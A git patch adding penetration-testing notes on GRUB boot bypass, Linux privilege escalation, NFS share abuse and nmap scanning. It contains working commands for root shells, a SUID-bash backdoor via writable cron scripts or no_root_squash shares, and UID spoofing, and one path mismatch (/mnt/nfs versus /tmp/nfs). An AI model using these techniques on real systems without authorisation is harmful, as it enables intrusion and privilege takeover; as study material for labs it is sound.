From 198112501a57e6a80464357118e4c864f7504d70 Mon Sep 17 00:00:00 2001 From: Hadi <112569860+anotherhadi@users.noreply.github.com> Date: Wed, 3 Jun 2026 23:39:40 +0200 Subject: [PATCH] new notes Signed-off-by: Hadi <112569860+anotherhadi@users.noreply.github.com> --- src/content/notes/linux/grub-bypass.md | 67 +++++++++++++++ src/content/notes/linux/privesc.md | 80 ++++++++++++++++++ src/content/notes/network/ftp.md | 2 - src/content/notes/network/nfs.md | 79 ++++++++++++++++++ src/content/notes/network/nmap.md | 108 +++++++++++++++++++++++++ src/content/notes/network/rdp.md | 2 - src/content/notes/network/ssh.md | 2 - src/content/notes/network/telnet.md | 2 - src/content/notes/osint/tips.md | 2 +- src/content/notes/osint/twitter-x.md | 4 +- 10 files changed, 337 insertions(+), 11 deletions(-) create mode 100644 src/content/notes/linux/grub-bypass.md create mode 100644 src/content/notes/linux/privesc.md create mode 100644 src/content/notes/network/nfs.md create mode 100644 src/content/notes/network/nmap.md diff --git a/src/content/notes/linux/grub-bypass.md b/src/content/notes/linux/grub-bypass.md new file mode 100644 index 0000000..5d4ae31 --- /dev/null +++ b/src/content/notes/linux/grub-bypass.md @@ -0,0 +1,67 @@ +--- +title: "GRUB Boot Bypass" +description: "Physical access techniques to get a root shell by editing GRUB boot parameters." +tags: ["linux", "grub", "physical-access", "privesc"] +publishDate: 2026-05-18 +--- + +When GRUB is not password-protected, anyone with physical access can edit boot parameters and bypass authentication entirely. + +At the GRUB menu, press **`e`** to edit the selected entry. Modify the line starting with `linux`, then press **`F10`** to boot. + +## Techniques + +### init=/bin/sh + +Replaces the init process with a shell; drops directly into a root shell before any login prompt. + +``` +linux ... init=/bin/sh +``` + +Filesystem is mounted read-only by default. Remount to make changes: + +```bash +mount -o remount,rw / +``` + +### init=/bin/bash + +Same as above but uses bash. Add `rw` on the `linux` line to mount read-write from the start: + +``` +linux ... rw init=/bin/bash +``` + +### rd.break (systemd) + +Interrupts the boot process in the initramfs, before the real root filesystem is mounted. Useful for resetting the root password. + +``` +linux ... rd.break +``` + +From the initramfs shell: + +```bash +mount -o remount,rw /sysroot +chroot /sysroot +passwd root +exit +``` + +### single (single-user mode) + +Boots into maintenance mode. On some distros this drops to a root shell without a password prompt (not Debian/Ubuntu). + +``` +linux ... single +``` + +### systemd.unit=rescue.target + +systemd equivalent of single-user mode: minimal services, root shell. + +``` +linux ... systemd.unit=rescue.target +``` diff --git a/src/content/notes/linux/privesc.md b/src/content/notes/linux/privesc.md new file mode 100644 index 0000000..c3635e9 --- /dev/null +++ b/src/content/notes/linux/privesc.md @@ -0,0 +1,80 @@ +--- +title: "Linux Privilege Escalation" +description: "Common misconfigurations and weaknesses to check when escalating privileges on Linux." +tags: ["linux", "privesc", "post-exploitation"] +publishDate: 2026-05-18 +--- + +## Sudo + +```bash +sudo -l +``` + +Check [GTFOBins](https://gtfobins.github.io) for any listed binary. + +If `env_keep+=LD_PRELOAD` is set: + +```bash +# compile a shared lib that spawns a shell +gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles +sudo LD_PRELOAD=/tmp/shell.so +``` + +## SUID / SGID + +```bash +find / -user root -perm -4000 -ls 2>/dev/null # SUID +find / -group root -perm -2000 -ls 2>/dev/null # SGID +``` + +Check any non-standard binary on GTFOBins. + +## Misconfiguration + +```bash +# World-writable directories +find / -type d -perm -2 -ls 2>/dev/null + +# World-writable files owned by root +find / -user root -perm -2 ! -type l -ls 2>/dev/null +``` + +## Cron Jobs + +```bash +cat /etc/crontab +ls -la /etc/cron.* +crontab -l +``` + +If a cron runs a script you can write to, replace its content: + +```bash +echo 'chmod +s /bin/bash' >> /path/to/script.sh +``` + +If the cron uses a relative PATH and a directory is writable, drop a malicious binary earlier in `$PATH`. + +## Capabilities + +```bash +getcap -r / 2>/dev/null +``` + +Dangerous capabilities: `cap_setuid`, `cap_net_raw`, `cap_dac_override`. +Check [GTFOBins](https://gtfobins.github.io) for exploitation. + +## Kernel Exploits + +```bash +uname -r +searchsploit linux kernel $(uname -r) +``` + +## LinPEAS / WinPEAS + +Automated enumeration scripts to surface privesc vectors quickly. + +- [LinPEAS (linux)](https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS) +- [WinPEAS (windows)](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS) diff --git a/src/content/notes/network/ftp.md b/src/content/notes/network/ftp.md index a8825ba..1e0cb3c 100644 --- a/src/content/notes/network/ftp.md +++ b/src/content/notes/network/ftp.md @@ -5,8 +5,6 @@ tags: ["ftp", "network", "service"] publishDate: 2026-04-29 --- -## Overview - FTP runs on **port 21** (control) and uses a secondary data channel (port 20 for active, ephemeral port for passive). Common implementations: vsftpd, ProFTPD, Pure-FTPd, FileZilla Server, IIS FTP. diff --git a/src/content/notes/network/nfs.md b/src/content/notes/network/nfs.md new file mode 100644 index 0000000..39e628f --- /dev/null +++ b/src/content/notes/network/nfs.md @@ -0,0 +1,79 @@ +--- +title: "NFS" +description: "Enumeration, mounting and privilege escalation techniques for NFS shares." +tags: ["nfs", "network", "service"] +publishDate: 2026-05-18 +--- + +NFS (Network File System) runs on **port 2049** and allows remote filesystem mounting over the network. +Common on Linux/Unix environments. Access control is defined in `/etc/exports` on the server. + +## Enumeration + +### Nmap + +```bash +nmap -sV -p 111,2049 $IP +nmap -p 111,2049 --script nfs-* $IP +``` + +Key scripts: + +- `nfs-showmount`: lists exported shares +- `nfs-ls`: lists files in shares +- `nfs-statfs`: retrieves disk stats + +### List shares + +```bash +showmount -e $IP +rpcinfo -p $IP +``` + +## Mount + +```bash +mkdir /mnt/nfs +mount -t nfs $IP:/share /mnt/nfs +mount -t nfs -o vers=2 $IP:/share /mnt/nfs # force NFSv2 +umount /mnt/nfs +``` + +## Privilege Escalation + +### no_root_squash + +If the share is exported with `no_root_squash`, the remote root user keeps root privileges on the share. + +Check `/etc/exports` on the server (if readable): + +```bash +cat /etc/exports +``` + +Look for: + +``` +/share *(rw,no_root_squash) +``` + +If present, copy a SUID binary onto the share as root from your attacker machine: + +```bash +cp /bin/bash /mnt/nfs/bash +chmod +s /mnt/nfs/bash +``` + +Then execute it on the target with `-p` to keep the SUID effective UID: + +```bash +/tmp/nfs/bash -p +``` + +### UID spoofing + +NFS authenticates by UID. If you know a file is owned by UID 1001 on the server, impersonate it directly: + +```bash +python3 -c "import os; os.setuid(1001); os.system('/bin/bash')" +``` diff --git a/src/content/notes/network/nmap.md b/src/content/notes/network/nmap.md new file mode 100644 index 0000000..f603028 --- /dev/null +++ b/src/content/notes/network/nmap.md @@ -0,0 +1,108 @@ +--- +title: "Nmap" +description: "Host discovery, port scanning, service detection and NSE scripting" +tags: ["nmap", "network", "enumeration"] +publishDate: 2026-05-18 +--- + +Nmap is a network scanner used for host discovery, port scanning, service/version detection, OS fingerprinting, and vulnerability scripting via NSE. + +## Host Discovery + +```bash +nmap -sn 192.168.1.0/24 # ping sweep, no port scan +nmap -sn -PR 192.168.1.0/24 # ARP ping (local network) +nmap -Pn $IP # skip host discovery, treat as up +``` + +## Port Scanning + +```bash +nmap $IP # top 1000 ports (SYN scan if root) +nmap -p 80,443,8080 $IP # specific ports +nmap -p 1-65535 $IP # all ports +nmap -p- $IP # shorthand for all ports +nmap -sU $IP # UDP scan +nmap -sU -sS $IP # UDP + SYN together +``` + +Scan types: + +- `-sS`: SYN scan (stealth, requires root) +- `-sT`: TCP connect scan (no root needed) +- `-sU`: UDP scan +- `-sA`: ACK scan (firewall rule mapping) +- `-sN/sF/sX`: Null, FIN, Xmas (evasion, unreliable on Windows) + +## Service & Version Detection + +```bash +nmap -sV $IP +nmap -sV --version-intensity 9 $IP # more aggressive probing +``` + +## OS Detection + +```bash +nmap -O $IP +nmap -O --osscan-guess $IP # guess if not confident +``` + +## Aggressive Scan + +```bash +nmap -A $IP # -sV -O --script=default --traceroute +``` + +## Timing Templates + +```bash +nmap -T0 $IP # paranoid (IDS evasion, very slow) +nmap -T1 $IP # sneaky +nmap -T3 $IP # normal (default) +nmap -T4 $IP # aggressive (faster, good for CTFs) +nmap -T5 $IP # insane (may miss results) +``` + +## NSE Scripts + +```bash +nmap --script default $IP +nmap --script vuln $IP +nmap --script "ftp-*" $IP +nmap --script safe $IP +nmap --script $script --script-args user=$user,pass=$password $IP +``` + +Common script categories: `auth`, `brute`, `default`, `discovery`, `dos`, `exploit`, `intrusive`, `safe`, `version`, `vuln`. + +Scripts are located in `/usr/share/nmap/scripts/`. + +## Output Formats + +```bash +nmap -oN output.txt $IP # normal +nmap -oX output.xml $IP # XML +nmap -oG output.gnmap $IP # grepable +nmap -oA output $IP # all three at once +``` + +## Common Profiles + +Quick full scan: + +```bash +nmap -p- -T4 --min-rate 5000 -sV -sC -oA full $IP +``` + +CTF/lab initial recon: + +```bash +nmap -sV -sC -p- --open $IP +``` + +UDP top ports: + +```bash +nmap -sU --top-ports 100 $IP +``` diff --git a/src/content/notes/network/rdp.md b/src/content/notes/network/rdp.md index 4131e69..554fd6f 100644 --- a/src/content/notes/network/rdp.md +++ b/src/content/notes/network/rdp.md @@ -5,8 +5,6 @@ tags: ["rdp", "network", "service"] publishDate: 2026-05-04 --- -## Overview - RDP (Remote Desktop Protocol) runs on **port 3389** and provides a graphical remote session. Common on Windows servers and workstations. diff --git a/src/content/notes/network/ssh.md b/src/content/notes/network/ssh.md index 96e7d50..5a3e714 100644 --- a/src/content/notes/network/ssh.md +++ b/src/content/notes/network/ssh.md @@ -5,8 +5,6 @@ tags: ["ssh", "network", "service"] publishDate: 2026-05-04 --- -## Overview - SSH runs on **port 22** and provides an encrypted remote shell. Common implementations: OpenSSH, Dropbear, Bitvise. diff --git a/src/content/notes/network/telnet.md b/src/content/notes/network/telnet.md index 5d13d91..2d4cbc9 100644 --- a/src/content/notes/network/telnet.md +++ b/src/content/notes/network/telnet.md @@ -5,8 +5,6 @@ tags: ["telnet", "network", "service"] publishDate: 2026-05-04 --- -## Overview - Telnet runs on **port 23** and transmits all data (including credentials) in **cleartext**. Common on embedded devices, legacy systems, routers, and IoT equipment. diff --git a/src/content/notes/osint/tips.md b/src/content/notes/osint/tips.md index 677fc0e..aa9f545 100644 --- a/src/content/notes/osint/tips.md +++ b/src/content/notes/osint/tips.md @@ -32,7 +32,7 @@ If the page has been taken down or modified, the cached version may still show t ## Domain History -[VirusTotal](https://www.virustotal.com) shows the historical DNS records, subdomains, and associated IPs for any domain — useful when a site has moved or been taken down. +[VirusTotal](https://www.virustotal.com) shows the historical DNS records, subdomains, and associated IPs for any domaint useful when a site has moved or been taken down. [ViewDNS.info](https://viewdns.info) covers WHOIS history, reverse IP, reverse MX, and port scans from a single interface. diff --git a/src/content/notes/osint/twitter-x.md b/src/content/notes/osint/twitter-x.md index 691c1a1..44cc98e 100644 --- a/src/content/notes/osint/twitter-x.md +++ b/src/content/notes/osint/twitter-x.md @@ -44,9 +44,9 @@ tweet_id = 1234567890123456789 timestamp_ms = (tweet_id >> 22) + 1288834974657 ``` -`1288834974657` is Twitter's custom epoch (Nov 4, 2010). Works on both tweet IDs and user IDs — useful to confirm account creation date without needing profile metadata. +`1288834974657` is Twitter's custom epoch (Nov 4, 2010). Works on both tweet IDs and user IDs: useful to confirm account creation date without needing profile metadata. -Several online converters exist if you don't want to do it manually — search "snowflake id decoder". +Several online converters exist if you don't want to do it manually: search "snowflake id decoder". ### Direct profile URL by ID